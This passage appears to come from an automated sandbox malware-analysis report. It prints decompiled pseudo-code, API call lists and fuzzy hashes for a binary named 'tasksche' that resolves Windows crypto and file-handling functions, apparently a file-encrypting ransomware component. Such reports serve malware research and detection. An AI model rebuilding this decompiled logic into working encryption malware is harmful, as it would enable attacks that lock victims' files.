                                                                                                                                                				signed int _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				signed int _v44;
                                                                                                                                                				char _v56;
                                                                                                                                                				signed int _t150;
                                                                                                                                                				signed int _t151;
                                                                                                                                                				signed int _t155;
                                                                                                                                                				signed int* _t157;
                                                                                                                                                				signed char _t158;
                                                                                                                                                				intOrPtr _t219;
                                                                                                                                                				signed int _t230;
                                                                                                                                                				signed char* _t236;
                                                                                                                                                				signed char* _t237;
                                                                                                                                                				signed char* _t238;
                                                                                                                                                				signed char* _t239;
                                                                                                                                                				signed int* _t240;
                                                                                                                                                				signed char* _t242;
                                                                                                                                                				signed char* _t243;
                                                                                                                                                				signed char* _t245;
                                                                                                                                                				signed int _t260;
                                                                                                                                                				signed int* _t273;
                                                                                                                                                				signed int _t274;
                                                                                                                                                				void* _t275;
                                                                                                                                                				void* _t276;
                                                                                                                                                
                                                                                                                                                				_t275 = __ecx;
                                                                                                                                                				if( *((char*)(__ecx + 4)) == 0) {
                                                                                                                                                					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                                                                                                                					_push(0x40d570);
                                                                                                                                                					_push( &_v56);
                                                                                                                                                					L0040776E();
                                                                                                                                                				}
	_t150 =  *(_t275 + 0x3cc);
	if(_t150 == 0x10) {
		return E004031BC(_t275, _a4, _a8);
	}
	asm("cdq");
	_t230 = 4;
	_t151 = _t150 / _t230;
	_t274 = _t151;
	asm("sbb eax, eax");
	_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
	_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
	_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
	_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
	_t157 = _t275 + 0x454;
	if(_t274 > 0) {
		_v16 = _t274;
		_v8 = _t275 + 0x1e8;
		_t242 = _a4;
		do {
			_t243 =  &(_t242[1]);
			 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
			 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
			_t245 =  &(_t243[2]);
			_t273 = _t157;
			 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
			_v8 = _v8 + 4;
			_t242 =  &(_t245[1]);
			_t157 =  &(_t157[1]);
			 *_t273 =  *_t273 ^  *_v8;
			_t27 =  &_v16;
			 *_t27 = _v16 - 1;
		} while ( *_t27 != 0);
	}
	_t158 = 1;
	_v16 = _t158;
	if( *(_t275 + 0x410) > _t158) {
		_v12 = _t275 + 0x208;
		do {
			if(_t274 > 0) {
				_t260 = _v28;
				_v8 = _v12;
				_a4 = _t260;
				_v36 = _v24 - _t260;
				_t240 = _t275 + 0x434;
				_v40 = _v32 - _t260;
				_v20 = _t274;
				do {
					asm("cdq");
					_v44 = 0;
					asm("cdq");
					asm("cdq");
					_v8 = _v8 + 4;
					 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
					_t240 =  &(_t240[1]);
					_a4 = _a4 + 1;
					_t84 =  &_v20;
					 *_t84 = _v20 - 1;
				} while ( *_t84 != 0);
			}
			memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
			_v12 = _v12 + 0x20;
			_t276 = _t276 + 0xc;
			_v16 = _v16 + 1;
			_t158 = _v16;
		} while (_t158 <  *(_t275 + 0x410));
	}
	_v8 = _v8 & 0x00000000;
	if(_t274 > 0) {
		_t236 = _a8;
		_t219 = _v24;
		_a8 = _t275 + 0x454;
		_v44 = _v28 - _t219;
		_v40 = _v32 - _t219;
		do {
			_a8 =  &(_a8[4]);
			_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
			 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
			_t237 =  &(_t236[1]);
			asm("cdq");
			 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
			asm("cdq");
			_t238 =  &(_t237[1]);
			 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
			_t239 =  &(_t238[1]);
			asm("cdq");
			_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
			 *_t239 = _t158;
			_t236 =  &(_t239[1]);
			_v8 = _v8 + 1;
			_t219 = _t219 + 1;
		} while (_v8 < _t274);
	}
	return _t158;
}

APIs
• ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
• _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
Strings
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: ??0exception@@ExceptionThrowmemcpy
• String ID:
• API String ID: 2382887404-3916222277
• Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
• Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
• Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
• Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E004029CC(void* _a4) {
                                                                                                                                                				void* _t17;
                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                				signed int _t35;
                                                                                                                                                				void* _t37;
                                                                                                                                                
                                                                                                                                                				_t37 = _a4;
                                                                                                                                                				if(_t37 != 0) {
                                                                                                                                                					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
                                                                                                                                                						_t25 =  *((intOrPtr*)(_t37 + 4));
                                                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
                                                                                                                                                					}
                                                                                                                                                					if( *(_t37 + 8) == 0) {
                                                                                                                                                						L9:
                                                                                                                                                						_t18 =  *((intOrPtr*)(_t37 + 4));
                                                                                                                                                						if(_t18 != 0) {
                                                                                                                                                							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
                                                                                                                                                						}
                                                                                                                                                						return HeapFree(GetProcessHeap(), 0, _t37);
                                                                                                                                                					} else {
                                                                                                                                                						_t35 = 0;
                                                                                                                                                						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
                                                                                                                                                							L8:
                                                                                                                                                							free( *(_t37 + 8));
                                                                                                                                                							goto L9;
                                                                                                                                                						} else {
                                                                                                                                                							goto L5;
                                                                                                                                                						}
                                                                                                                                                						do {
                                                                                                                                                							L5:
                                                                                                                                                							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
                                                                                                                                                							if(_t23 != 0) {
                                                                                                                                                								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
                                                                                                                                                							}
                                                                                                                                                							_t35 = _t35 + 1;
                                                                                                                                                						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
                                                                                                                                                						goto L8;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return _t17;
			}

                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                                                                                                                                                Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$FreeProcessfree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3428986607-0
                                                                                                                                                • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                                                                                • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                                                                                                                                                • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                                                                                • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 16%
                                                                                                                                                			E004018B9(void* __ecx) {
                                                                                                                                                				signed int _t10;
                                                                                                                                                				signed int _t11;
                                                                                                                                                				long* _t12;
                                                                                                                                                				void* _t13;
                                                                                                                                                				void* _t18;
                                                                                                                                                
                                                                                                                                                				_t18 = __ecx;
                                                                                                                                                				_t10 =  *(__ecx + 8);
                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                					 *0x40f89c(_t10);
                                                                                                                                                					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                                                                                                                				}
                                                                                                                                                				_t11 =  *(_t18 + 0xc);
                                                                                                                                                				if(_t11 != 0) {
                                                                                                                                                					 *0x40f89c(_t11);
                                                                                                                                                					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
                                                                                                                                                				}
                                                                                                                                                				_t12 =  *(_t18 + 4);
                                                                                                                                                				if(_t12 != 0) {
                                                                                                                                                					CryptReleaseContext(_t12, 0);
                                                                                                                                                					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
                                                                                                                                                				}
                                                                                                                                                				_t13 = 1;
                                                                                                                                                				return _t13;
			}

                                                                                                                                                APIs
                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                                                                                                                                                Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextCryptRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 829835001-0
                                                                                                                                                • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                                                                                • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                                                                                                                                                • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                                                                                • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040170A() {
                                                                                                                                                				void* _t3;
                                                                                                                                                				_Unknown_base(*)()* _t11;
                                                                                                                                                				struct HINSTANCE__* _t13;
                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                				intOrPtr _t20;
                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                
                                                                                                                                                				if(E00401A45() == 0) {
                                                                                                                                                					L11:
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				_t18 =  *0x40f878; // 0x0
                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                					L10:
                                                                                                                                                					_t3 = 1;
                                                                                                                                                					return _t3;
                                                                                                                                                				}
                                                                                                                                                				_t13 = LoadLibraryA("kernel32.dll");
                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
                                                                                                                                                				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
                                                                                                                                                				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
                                                                                                                                                				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
                                                                                                                                                				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
                                                                                                                                                				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
                                                                                                                                                				_t11 = GetProcAddress(_t13, "CloseHandle");
                                                                                                                                                				_t20 =  *0x40f878; // 0x0
                                                                                                                                                				 *0x40f890 = _t11;
                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                				_t21 =  *0x40f87c; // 0x0
                                                                                                                                                				if(_t21 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                				_t22 =  *0x40f880; // 0x0
                                                                                                                                                				if(_t22 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                				_t23 =  *0x40f884; // 0x0
                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                				_t24 =  *0x40f888; // 0x0
                                                                                                                                                				if(_t24 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                				_t25 =  *0x40f88c; // 0x0
                                                                                                                                                				if(_t25 == 0 || _t11 == 0) {
                                                                                                                                                					goto L11;
                                                                                                                                                				} else {
                                                                                                                                                					goto L10;
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                                                                                                                • API String ID: 2238633743-1294736154
                                                                                                                                                • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                                                                                • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                                                                                                                                                • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                                                                                • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401A45() {
                                                                                                                                                				void* _t1;
                                                                                                                                                				_Unknown_base(*)()* _t9;
                                                                                                                                                				struct HINSTANCE__* _t11;
                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                				intOrPtr _t20;
                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                
                                                                                                                                                				_t15 =  *0x40f894; // 0x0
                                                                                                                                                				if(_t15 != 0) {
                                                                                                                                                					L8:
                                                                                                                                                					_t1 = 1;
                                                                                                                                                					return _t1;
                                                                                                                                                				}
                                                                                                                                                				_t11 = LoadLibraryA("advapi32.dll");
                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                					L9:
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
                                                                                                                                                				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
                                                                                                                                                				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
                                                                                                                                                				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
                                                                                                                                                				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
                                                                                                                                                				_t9 = GetProcAddress(_t11, "CryptGenKey");
                                                                                                                                                				_t17 =  *0x40f894; // 0x0
                                                                                                                                                				 *0x40f8a8 = _t9;
                                                                                                                                                				if(_t17 == 0) {
                                                                                                                                                					goto L9;
                                                                                                                                                				}
                                                                                                                                                				_t18 =  *0x40f898; // 0x0
                                                                                                                                                				if(_t18 == 0) {
                                                                                                                                                					goto L9;
                                                                                                                                                				}
                                                                                                                                                				_t19 =  *0x40f89c; // 0x0
                                                                                                                                                				if(_t19 == 0) {
                                                                                                                                                					goto L9;
                                                                                                                                                				}
                                                                                                                                                				_t20 =  *0x40f8a0; // 0x0
                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                					goto L9;
                                                                                                                                                				}
                                                                                                                                                				_t21 =  *0x40f8a4; // 0x0
                                                                                                                                                				if(_t21 == 0 || _t9 == 0) {
                                                                                                                                                					goto L9;
                                                                                                                                                				} else {
                                                                                                                                                					goto L8;
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                                                                                                                • API String ID: 2238633743-2459060434
                                                                                                                                                • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                                                                                • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                                                                                                                                                • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                                                                                • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
                                                                                                                                                				long _v8;
                                                                                                                                                				char _v267;
                                                                                                                                                				char _v268;
                                                                                                                                                				struct _FILETIME _v284;
                                                                                                                                                				struct _FILETIME _v292;
                                                                                                                                                				struct _FILETIME _v300;
                                                                                                                                                				long _v304;
                                                                                                                                                				char _v568;
                                                                                                                                                				char _v828;
                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                				intOrPtr _t96;
                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                				char _t100;
                                                                                                                                                				void* _t112;
                                                                                                                                                				void* _t113;
                                                                                                                                                				int _t124;
                                                                                                                                                				long _t131;
                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                				char* _t137;
                                                                                                                                                				char* _t144;
                                                                                                                                                				void* _t148;
                                                                                                                                                				char* _t150;
                                                                                                                                                				void* _t154;
                                                                                                                                                				signed int _t155;
                                                                                                                                                				long _t156;
                                                                                                                                                				void* _t157;
                                                                                                                                                				char* _t158;
                                                                                                                                                				long _t159;
                                                                                                                                                				intOrPtr* _t161;
                                                                                                                                                				long _t162;
                                                                                                                                                				void* _t163;
                                                                                                                                                				void* _t164;
                                                                                                                                                
                                                                                                                                                				_t154 = __edx;
                                                                                                                                                				_t139 = __ecx;
                                                                                                                                                				_t136 = _a16;
                                                                                                                                                				_t161 = __ecx;
                                                                                                                                                				if(_t136 == 3) {
                                                                                                                                                					_t78 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                                                					_t155 = _a4;
                                                                                                                                                					__eflags = _t155 - _t78;
                                                                                                                                                					if(_t155 == _t78) {
                                                                                                                                                						L14:
                                                                                                                                                						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
                                                                                                                                                						__eflags = _t156;
                                                                                                                                                						if(_t156 <= 0) {
                                                                                                                                                							E00406A97( *_t161);
                                                                                                                                                							_t14 = _t161 + 4;
                                                                                                                                                							 *_t14 =  *(_t161 + 4) | 0xffffffff;
                                                                                                                                                							__eflags =  *_t14;
                                                                                                                                                						}
                                                                                                                                                						__eflags = _a7;
                                                                                                                                                						if(_a7 == 0) {
                                                                                                                                                							__eflags = _t156;
                                                                                                                                                							if(_t156 <= 0) {
                                                                                                                                                								__eflags = _t156 - 0xffffff96;
                                                                                                                                                								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                                                                                                                							}
                                                                                                                                                							return 0x600;
                                                                                                                                                						} else {
                                                                                                                                                							L17:
                                                                                                                                                							return 0;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					__eflags = _t78 - 0xffffffff;
                                                                                                                                                					if(_t78 != 0xffffffff) {
                                                                                                                                                						E00406A97( *__ecx);
                                                                                                                                                						_pop(_t139);
                                                                                                                                                					}
                                                                                                                                                					_t89 =  *_t161;
                                                                                                                                                					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                                                                                                                					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
                                                                                                                                                					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
                                                                                                                                                						L3:
                                                                                                                                                						return 0x10000;
                                                                                                                                                					} else {
                                                                                                                                                						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
                                                                                                                                                						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
                                                                                                                                                							L11:
                                                                                                                                                							_t91 =  *_t161;
                                                                                                                                                							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
                                                                                                                                                							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
                                                                                                                                                								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                                                                                                                								 *(_t161 + 4) = _t155;
                                                                                                                                                								_pop(_t139);
                                                                                                                                                								goto L14;
                                                                                                                                                							}
                                                                                                                                                							E00406520(_t91);
                                                                                                                                                							L10:
                                                                                                                                                							goto L11;
                                                                                                                                                						}
                                                                                                                                                						E004064E2(_t139, _t89);
                                                                                                                                                						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
